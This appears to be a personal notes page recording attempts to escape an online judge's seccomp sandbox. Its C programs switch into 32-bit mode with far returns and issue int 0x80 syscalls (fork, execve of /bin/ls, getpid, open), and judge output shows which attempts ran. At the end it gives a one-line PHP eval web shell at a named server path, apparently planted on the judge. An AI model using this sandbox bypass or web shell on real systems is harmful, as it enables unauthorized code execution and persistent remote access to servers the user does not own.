    "ret\n\t"                       // 返回到main中的某一位置处继续执行
 


    "0:\n\t"
    "movl $0x23, 4(%rsp)\n\t"
    "retf\n\t"

    "1:\n\t"
    "movl $0x33, 4(%rsp)\n\t"
    "retf\n\t"
    );
}
 
int main()
{
    printf(":Beta~\n");

    int pid = my_fork();
    
    if (pid){
        printf("1 my exe cout >> pid: %d\n", pid);
    }
    else{
        printf("2 my exe cout >> pid: %d\n", pid);
    }
    
    return 0;
}

execve 改自上一个fork (WA)

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>
 
char *args[]={
    "/bin/ls",
    0
};
 
static int __attribute__((used)) stk[100];
 
__attribute__((naked)) int my_execve(char * a,char** b,char** c){
    __asm__ __volatile__ (
    "lea (stk), %rsp\n\t"           // 找一处可写的空间作为x86的栈

    "movq %rbp, 12(%rsp)\n\t"           //1: 保存下x64的栈的rbp,等下运行完int80后还要转回x64

    "call 0f\n\t"                   // 转x86

    "mov $11, %eax\n\t"
    "mov %edi, %ebx\n\t"
    "mov %esi, %ecx\n\t"
    "mov %edx, %edx\n\t"
    "int $0x80\n\t"                 //execve


    "call 1f\n\t"                   // 转回x64
    
    "pop %rbp\n\t"            // 需要调整一个offset=8,所以pop一次
    "pop %rsp\n\t"            // 对应1: 恢复回x64的栈
    "pop %rbp\n\t"                  // 弹出旧的rbp
    "ret\n\t"                       // 返回到main中的某一位置处继续执行
 


    "0:\n\t"
    "movl $0x23, 4(%rsp)\n\t"
    "retf\n\t"

    "1:\n\t"
    "movl $0x33, 4(%rsp)\n\t"
    "retf\n\t"
    );
}
 
int main()
{
    printf(":Beta~\n");

    my_execve(args[0],args,0);
    
    return 0;
}

11.28

fork 真裸函数 - wa

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>

 
static int __attribute__((used)) stk[100];

int my_fork();

__asm__ (
".global my_fork                \n\t"
".section .text                    \n\t"

"my_fork:                        \n\t"

    "push %rbp                    \n\t"
    "mov %rsp, %rbp                \n\t" 
    
    "lea (stk), %rsp            \n\t"              // 找一处可写的空间作为x86的栈

    "movq %rbp, 12(%rsp)        \n\t"           //1: 保存下x64的栈的rbp,等下运行完int80后还要转回x64

    "call 0f                    \n\t"             // 转x86

    "mov $2, %eax                \n\t"
    "int $0x80                    \n\t"             // fork


    "call 1f                    \n\t"              // 转回x64
    
    "pop %rbp                    \n\t"              // 需要调整一个offset=8,所以pop一次
    "pop %rsp                    \n\t"              // 1: 恢复回x64的栈
    "pop %rbp                    \n\t"           // 弹出旧的rbp
    "ret                        \n\t"              // 返回到main中的某一位置处继续执行
 


    "0:                            \n\t"            // to 32
    "movl $0x23, 4(%rsp)        \n\t"
    "retf                        \n\t"

    "1:                            \n\t"            // to 64
    "movl $0x33, 4(%rsp)        \n\t"
    "retf                        \n\t"
    );


int main()
{
    printf(":Beta~\n");

    int pid = my_fork();
    
    if (pid > 0){
        printf("I am the first process! My child is pid: %d\n", pid);   
    }else if (pid == 0){
        printf("I am the child process! My child is pid: %d\n", pid); 
    }
    else{
        printf("fork fail! pid = %d\n", pid);
        //printf("errno: %d\n", errno);
        //printf("errno: %d\n", EAGAIN);
        //printf("errno: %d\n", ENOMEM);
    }
    
    return 0;
}

execve 真裸函数 有的re有的wa

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>

char *args[]={
    "/bin/ls",
    0
};
 
static int __attribute__((used)) stk[100];

int my_execve(char * a,char** b,char** c);

__asm__ (
".global my_execve                \n\t"
".section .text                    \n\t"

"my_execve:                        \n\t"
    
    "push %rbp                    \n\t"
    "mov %rsp, %rbp                \n\t" 
    
    "lea (stk), %rsp            \n\t"         // 找一处可写的空间作为x86的栈

    "movq %rbp, 12(%rsp)        \n\t"         //A: 保存下x64的栈的rbp,等下运行完int80后还要转回x64

    "call 0f                    \n\t"         // 转x86

    "mov $11, %eax                \n\t"
    "mov %edi, %ebx                \n\t"
    "mov %esi, %ecx                \n\t"
    "mov %edx, %edx                \n\t"
    "int $0x80                    \n\t"         //execve


    "call 1f                    \n\t"         // 转回x64
    
    "pop %rbp                    \n\t"         // 需要调整一个offset=8,所以pop一次
    "pop %rsp                    \n\t"         // 对应A: 恢复回x64的栈
    "pop %rbp                    \n\t"         // 弹出旧的rbp
    "ret                        \n\t"         // 返回到main中的某一位置处继续执行
 


    "0:                            \n\t"          // to 32
    "movl $0x23, 4(%rsp)        \n\t"
    "retf                        \n\t"

    "1:                            \n\t"          // to 64 
    "movl $0x33, 4(%rsp)        \n\t"
    "retf                        \n\t"
    );

 
int main()
{
    printf(":Beta~\n");

    my_execve(args[0],args,0);
    printf(":Beta~~\n");
    return 0;
}
root@ubuntu:/home/judge/run1000/log# cat diff.out 
========[sample.out]=========
Expected                              |    Yours
2                                  \    :Beta~
                                  >    :Beta~~

==============================
time_space_table:
/1000/sample.in:WA mem=1048k time=2ms

root@ubuntu:/home/judge/run1000/log# 

getpid wa

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>

static int __attribute__((used)) stk[100];

int my_getpid();

__asm__ (
".global my_getpid              \n\t"
".section .text                    \n\t"

"my_getpid:                        \n\t"
    
    "push %rbp                    \n\t"
    "mov %rsp, %rbp                \n\t" 
    
    "lea (stk), %rsp            \n\t"         // 找一处可写的空间作为x86的栈

    "movq %rbp, 12(%rsp)        \n\t"         //A: 保存下x64的栈的rbp,等下运行完int80后还要转回x64

    "call 0f                    \n\t"         // 转x86

    "mov $0x14, %eax            \n\t"
    "int $0x80                    \n\t"         //execve


    "call 1f                    \n\t"         // 转回x64
    
    "pop %rbp                    \n\t"         // 需要调整一个offset=8,所以pop一次
    "pop %rsp                    \n\t"         // 对应A: 恢复回x64的栈
    "pop %rbp                    \n\t"         // 弹出旧的rbp
    "ret                        \n\t"         // 返回到main中的某一位置处继续执行
 


    "0:                            \n\t"          // to 32
    "movl $0x23, 4(%rsp)        \n\t"
    "retf                        \n\t"

    "1:                            \n\t"          // to 64 
    "movl $0x33, 4(%rsp)        \n\t"
    "retf                        \n\t"
    );

 
int main()
{
    printf(":Beta~\n");

    int r = my_getpid();
    
    printf("my_getpid is %d", r);

    return 0;
}
root@ubuntu:/home/judge/run1000/log# cat diff.out 
========[sample.out]=========
Expected                              |    Yours
2                                  \    :Beta~
                                  >    my_getpid is 39214
==============================
time_space_table:
/1000/sample.in:WA mem=1048k time=3ms

root@ubuntu:/home/judge/run1000/log# 

open实现的create wa

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

static int __attribute__((used)) stk[100];
static int __attribute__((used)) stk2[100];

int my_open(const char *pathname, int flags);
size_t my_read(int fd, char *buf, size_t count);

__asm__ (
".global my_open                \n\t"
".section .text                    \n\t"

"my_open:                        \n\t"
    
    "push %rbp                    \n\t"
    "mov %rsp, %rbp                \n\t" 
    
    "lea (stk), %rsp            \n\t"         // 找一处可写的空间作为x86的栈

    "movq %rbp, 12(%rsp)        \n\t"         //A: 保存下x64的栈的rbp,等下运行完int80后还要转回x64

    "call 0f                    \n\t"         // 转x86

    "mov $5, %eax                \n\t"
    "mov %edi, %ebx                \n\t"
    "mov %esi, %ecx                \n\t"
    "int $0x80                    \n\t"         //execve


    "call 1f                    \n\t"         // 转回x64
    
    "pop %rbp                    \n\t"         // 需要调整一个offset=8,所以pop一次
    "pop %rsp                    \n\t"         // 对应A: 恢复回x64的栈
    "pop %rbp                    \n\t"         // 弹出旧的rbp
    "ret                        \n\t"         // 返回到main中的某一位置处继续执行
 


    "0:                            \n\t"          // to 32
    "movl $0x23, 4(%rsp)        \n\t"
    "retf                        \n\t"

    "1:                            \n\t"          // to 64 
    "movl $0x33, 4(%rsp)        \n\t"
    "retf                        \n\t"
    );


__asm__ (
".global my_read                \n\t"
".section .text                    \n\t"

"my_read:                        \n\t"
    
    "push %rbp                    \n\t"
    "mov %rsp, %rbp                \n\t" 
    
    "lea (stk2), %rsp            \n\t"         // 找一处可写的空间作为x86的栈

    "movq %rbp, 12(%rsp)        \n\t"         //A: 保存下x64的栈的rbp,等下运行完int80后还要转回x64

    "call 0f                    \n\t"         // 转x86

    "mov $3, %eax                \n\t"
    "mov %edi, %ebx                \n\t"
    "mov %esi, %ecx                \n\t"
    "mov %edx, %edx                \n\t"
    "int $0x80                    \n\t"         //execve


    "call 1f                    \n\t"         // 转回x64
    
    "pop %rbp                    \n\t"         // 需要调整一个offset=8,所以pop一次
    "pop %rsp                    \n\t"         // 对应A: 恢复回x64的栈
    "pop %rbp                    \n\t"         // 弹出旧的rbp
    "ret                        \n\t"         // 返回到main中的某一位置处继续执行
 


    "0:                            \n\t"          // to 32
    "movl $0x23, 4(%rsp)        \n\t"
    "retf                        \n\t"

    "1:                            \n\t"          // to 64 
    "movl $0x33, 4(%rsp)        \n\t"
    "retf                        \n\t"
    );


int main()
{
    printf(":Beta~\n");

    int fd = my_open("new_file", O_RDWR|O_CREAT);
    printf("fd is %d\n", fd);

    return 0;
}
root@ubuntu:/home/judge/run1000/log# ls
ce.txt  data.in  diff.out  error.out  Main  Main.c  new_file  user.out
root@ubuntu:/home/judge/run1000/log# cat user.out 
:Beta~
fd is 6
root@ubuntu:/home/judge/run1000/log# 

创建了空文件new_file.

但是绕不过chroot.

../还是当前目录

一句话木马

/src/web/iyzyi.php

<?php @eval($_POS\T['iyzyi']);?>
Last modification:April 7th, 2023 at 02:22 pm